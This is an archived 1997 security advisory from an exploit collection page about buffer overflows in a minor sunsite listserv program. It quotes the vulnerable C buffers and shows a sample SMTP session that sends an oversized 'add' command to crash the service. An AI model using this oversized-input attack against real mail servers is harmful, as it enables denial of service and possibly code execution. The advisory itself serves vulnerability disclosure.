Nmap logo

Buffer overflows in the listserv mailing list manager.

Description:Stander buffer overflow stuff, although this may not be exploitable.
Compromise:Possibly just a DOS attack, unless you can make an exploit out of it.
Vulnerable Systems:Systems running unpatched versions of listserv.
Date:19 June 1997
Notes:This is NOT the L-Soft "listserv" program, instead it is a significantly less popular (and less powerful) listserv program available on sunsite.

Date: Sat, 1 Jan 1994 17:50:59 +0100

listserv buffer overflow(s)

             plaguez security advisory no. 4

               listserv buffer overflow(s)

Hello all,

[forget it if it's known stuff :), however, the archives
from sunsite still have this hole.]

i have found several buffer overflows in listserv,
a widely used mailing-lists managment program.

By exploiting those vulnerabilities, malicious hackers can
remotely execute arbitrary commands on the target machine:
typically, place backdoors on the system or remove users'
mail files, as listserv requires to run as sgid 'mail'.

Though, the impact is harmless  because it is almost
impossible to predict the parameters to use for the
actual overflow, i.e. stack prediction and buffer size.
This hole is still annoying because it can provide a
efficient DOS attack: the attacker would repeatly
connect to the target host and send an oversized buffer,
resulting in many segfaults on the target system.

Technical stuff:
User commands are sent directly through the body of the
message, where users can write  whatever they want.
Potential buffer overflows are located in the functions
that handle those commands. ( main() bof are mostly
 +file subscribe.c,

   function subscription(char *from,char *command,int add,
    int outsider)
   { char tmp[256], grp[256], adr[256];
      command is there a user command that hasnt been
      modified. An overflow may occure there.

Sample exploit:

$ telnet xxxxxx.xxx 25

Connected to
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
254 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
250 RAFZ04965 Message accepted for delivery
221 xxxxxxx.xxx closing connection

the listserv handling this session with bof and then crash.

Sorry I'm too lazy to make a fix... A possible one would be
to use dynamic length strings, or (easier to implement)
strip each command down to its 200 first characters for

that's all for this time,


   plaguez / libpcap
ln -sf  flames /dev/null

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]